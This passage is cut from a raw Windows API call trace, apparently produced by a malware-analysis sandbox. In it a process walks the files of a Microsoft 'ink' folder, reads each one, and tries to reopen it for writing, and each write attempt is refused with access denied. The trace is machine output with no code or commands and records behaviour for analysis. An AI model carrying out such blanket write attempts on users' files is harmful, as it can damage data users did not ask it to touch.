Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.601] AreFileApisANSI () returned 1 [0084.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml", lpUsedDefaultChar=0x0) returned 61 [0084.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0084.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.601] AreFileApisANSI () returned 1 [0084.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ea48 [0084.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 61 [0084.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.602] GetFileType (hFile=0x364) returned 0x1 [0084.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0084.602] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.602] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.602] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.603] CloseHandle (hObject=0x364) returned 1 [0084.603] AreFileApisANSI () returned 1 [0084.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e4f8 [0084.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 61 [0084.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.603] GetLastError () returned 0x5 [0084.603] GetLastError () returned 0x5 [0084.603] SetLastError (dwErrCode=0x5) [0084.603] GetLastError () returned 0x5 [0084.603] SetLastError (dwErrCode=0x5) [0084.603] GetLastError () returned 0x5 [0084.603] SetLastError (dwErrCode=0x5) [0084.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0084.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.603] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d126e12, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d126e12, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d6, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipshi.xml", cAlternateFileName="")) returned 1 [0084.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0084.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.604] AreFileApisANSI () returned 1 [0084.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml", lpUsedDefaultChar=0x0) returned 61 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0084.605] AreFileApisANSI () returned 1 [0084.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6ebe0 [0084.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 61 [0084.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.605] GetFileType (hFile=0x364) returned 0x1 [0084.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0084.605] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.605] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.605] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.606] CloseHandle (hObject=0x364) returned 1 [0084.606] AreFileApisANSI () returned 1 [0084.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0084.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7a) returned 0x6e470 [0084.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=61 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 61 [0084.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.606] GetLastError () returned 0x5 [0084.606] GetLastError () returned 0x5 [0084.606] SetLastError (dwErrCode=0x5) [0084.606] GetLastError () returned 0x5 [0084.606] SetLastError (dwErrCode=0x5) [0084.606] GetLastError () returned 0x5 [0084.606] SetLastError (dwErrCode=0x5) [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.606] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.606] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0084.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0084.607] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.607] AreFileApisANSI () returned 1 [0084.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", lpUsedDefaultChar=0x0) returned 62 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.607] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.608] AreFileApisANSI () returned 1 [0084.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.608] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6dfa8 [0084.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 62 [0084.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.608] GetFileType (hFile=0x364) returned 0x1 [0084.608] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0084.608] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.608] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.608] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.609] CloseHandle (hObject=0x364) returned 1 [0084.609] AreFileApisANSI () returned 1 [0084.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e470 [0084.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e470, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 62 [0084.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.609] GetLastError () returned 0x5 [0084.609] GetLastError () returned 0x5 [0084.609] SetLastError (dwErrCode=0x5) [0084.609] GetLastError () returned 0x5 [0084.609] SetLastError (dwErrCode=0x5) [0084.609] GetLastError () returned 0x5 [0084.609] SetLastError (dwErrCode=0x5) [0084.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0084.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.609] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.609] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d14d081, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d14d081, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa0a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsid.xml", cAlternateFileName="")) returned 1 [0084.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 